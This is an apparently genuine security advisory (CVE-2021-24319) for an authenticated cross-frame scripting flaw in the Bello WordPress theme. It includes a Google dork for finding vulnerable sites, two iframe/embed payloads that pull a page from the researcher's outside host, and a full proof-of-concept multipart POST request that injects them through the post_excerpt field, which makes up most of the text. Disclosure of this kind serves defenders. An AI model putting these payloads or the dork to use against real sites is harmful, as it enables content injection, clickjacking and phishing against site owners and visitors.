Bello WordPress Theme <= 1.5.9 - Authenticated XFS

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2021-24319
CWE: CWE-1021
Dork: inurl:/wp-content/themes/bello/

/*! - # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Authenticated XFS - # GOOGLE DORK: inurl:/wp-content/themes/bello/ - # DATE: 2021-03-21 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: BoldThemes [ https://bold-themes.com ] - # SOFTWARE VERSION: <= 1.5.9 - # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903 - # CVSS: AV:N/AC:L/PR:L/UI:R/S:C - # CWE: CWE-1021 - # CVE: CVE-2021-24319 */ ### -- [ Info: ] [i] An Authenticated XFS vulnerability was discovered in the Bello theme through v1.5.9 for WordPress. [i] Vulnerable parameter(s): &post_excerpt. [i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ]. ### -- [ Impact: ] [~] Malicious iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] <!--><embed src=https://m0ze.ru/payload/xfsii.html> [$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe> ### -- [ PoC | Authenticated XFS | My Listings: ] [!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1 Host: bello.bold-themes.com User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402 Content-Length: 13779 Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 Cookie: [user cookies] -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="action" ajax_submit -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="rwmb_form_config" 5d63602a0e2f80c83196bc5ea6405fca -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="post_title" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="post_content" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="post_excerpt" </textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html> <iframe src=https://m0ze.ru/payload/xfsii.html></iframe> -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="_thumbnail_id" 7316 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="_thumbnail_id" 7316 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="nonce_listing_cf" e1c3b088fu -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="_wp_http_referer" /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-location_position" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-region" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-price_from" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-price_to" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-price_free" 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-faq" 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi" 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned" 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package" bello-default-package -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email" -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant" 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms" 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]" 49 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]" 115 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name="rwmb_submit" 1 -----------------------------16118302073611242382926219402-- ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-1021%5D-Bello-WordPress-Theme-v1.5.9.txt
https://twitter.com/vladm0ze


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top